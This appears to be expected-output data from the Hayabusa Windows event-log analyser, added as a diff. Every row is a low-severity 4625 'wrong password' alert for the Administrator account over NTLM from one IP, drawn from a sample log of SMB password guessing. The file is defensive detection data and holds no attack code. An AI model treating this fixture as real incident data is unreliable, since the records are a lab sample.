+2016-09-20 01:52:42.617 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m6WCg3o4oatO42wW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.656 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KfCwo8ZUWiBqI8zC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.692 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8potisENMIsbNxcd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.732 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WgagMNj95dkg9uQd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.774 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o1EVsGLFugwePvgR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.816 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6q00SeueJQAiBGpe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.861 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QWzSR1cJ2XJNirSW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.904 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 39MY5ZvRJSHVkZZV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.944 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WyOdltctwdHNkH6i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.989 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OUcWk0xJn9zVMZSF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.023 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f2sauqNlJi3y0ZBk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.060 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bkih5QcLlcjw9gjg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.104 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3KlUJslcpS9jhLY4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.149 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: riuVWV1Ugr9c22hR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.189 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5OSj1I0sXkPf96OL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.229 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KsOJDxDiZSjoBj6F | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.269 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uH0bQ9zEi1xcfHn3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.308 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3AfNT0p4JC1VEfDd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.353 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S7T8R8U1WVHZQrYk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.388 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kamexpa7isWT8gLC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.437 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8CyHFKVcdTo0Upx3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.480 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U30aMcZuBD08GWK1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.527 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4mihftSCNCYdlBny | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.553 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K2wa0xwK6tnurGJQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.588 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0V3TbNrKEnrDcEYt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.629 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: T73JW9JURm8Br6MA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.673 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OAleyg3h8aMvVVJk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.713 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1LQllnWZFUIWa6rw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.757 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hlwPxSGUmvYH0rpL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.801 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VrI56o5TyeO48rQV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.845 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CKRMn75tv5Yi5rYK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.889 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MbJvec7rVisJ6WCC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.929 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xoubp5WTPqblBaps | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rBczkR92cKY41icQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.005 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MfUx3OizEb1LiOzj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.051 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SRaSOLOWhBEr0qkz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.085 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YnlI8Zh4td5m1fpx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.129 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wXUDXDa4wi3HivKo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.174 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TT7iOtVMFcEysCcI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.229 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1NJpI7KC3gj99aWs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.333 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H39cv9JEuLEjlp93 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.389 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4p9h1cjLeUzppSZb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E0fOpi4vr55QmO6x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.472 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GiKI4V6kpkY5zc9x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.513 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dLmu4n9qZdf3Q5zo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.547 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 87iJdX2E0ZJintvr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.592 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nxc4iIHP0kdqQNiG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.637 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RJIWekwBwcIUWjD1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.686 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GdnvboiIDzXTZ8MR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.740 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QGMPHNpljTlMYeet | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.794 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pWo4uVFtAbe4IjKC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.845 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YAPdDqbMY4rYiuZ3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.896 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ai2WCQ3MkWwSeOy9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.946 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ey1wbsD7w3fs02xP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.983 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sVGzidwZICNfLizg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.029 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8zjGPMJ6RBw48Ejx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.071 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MydK8AjPvyyckCEL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.105 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4fqkCliAQMiFffQU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.149 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ITkku4kN4csBFyUB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.197 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f5g9kMkSFhKrT2Py | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.241 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1xKLdwujTmLEc9ts | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.285 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sAW1YzCQ3CreseaP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.326 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vhqBirEHOKPepR3n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.376 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5uqSFXpzAWOnc90n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.421 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: McbeS9lRpbMc48jO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.477 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I6J0d7dQUmJNKJlu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.521 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QG3WU91rhTP9odx7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.579 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hSQRgB8yMfhb03g1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.614 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bzbZjRXTc0XvV4Ry | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.665 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k3ShOCSaLGX4YBWE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.704 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lIrydzi8nmY251Z1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.752 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h4vlRksTGxAqEt9j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.789 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uJMnD0foEDbcNfTj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.829 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HNWppBJLFojEFtiF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
